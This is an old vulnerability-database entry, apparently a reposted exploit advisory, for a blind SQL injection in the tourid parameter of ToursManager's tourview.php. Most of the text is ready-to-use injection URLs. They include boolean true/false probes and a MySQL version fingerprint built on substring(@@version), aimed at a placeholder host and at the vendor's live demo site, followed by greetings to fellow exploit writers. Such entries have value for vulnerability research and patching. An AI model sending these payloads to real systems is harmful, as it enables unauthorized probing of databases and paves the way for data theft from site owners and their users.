ToursManager (tourview.php tourid) Blind SQL Injection Vulnerability

2008-11-21T00:00:00
ID SSV:10074
Type seebug
Reporter Root
Modified 2008-11-21T00:00:00

Description

No description provided by source.

                                        
                                            
                                                [>] Name:-->             ToursManager PhP Script <= Blind Sql Injection
 
[>] Discovered by:-->  XaDoS
 
[>] ContacT m&:-->     xados[at]hotmail.it
 
[>] Site:-->                http://www.toursmanager.com
 
#########
 
[■] £XpLoIT:
 
|: http://www.demosite.com/tourview.php?tourid=2%20and%201=1--   (true)
 
|: http://www.demosite.com/tourview.php?tourid=2%20and%201=0--   (false)
 
Version:
|: http://www.demosite.com/tourview.php?tourid=2+and+substring(@@version,1,1)=5  (true)
|: http://www.demosite.com/tourview.php?tourid=2+and+substring(@@version,1,1)=4  (false)
 
V=> 5.x.x XD
 
#########
[■] D&M0:
 
|: http://www.toursmanager.com/demo/tourview.php?tourid=2%20and%201=1--
 
|: http://www.toursmanager.com/demo/tourview.php?tourid=2%20and%201=0--
 
|: http://www.toursmanager.com/demo/tourview.php?tourid=2+and+substring(@@version,1,1)=5 
 
#########
 
[■] Th4Nks T0:
 
\> Boom3rang </ (very kind) ;-)
\> Langy  </
\> Str0ke </
 
#########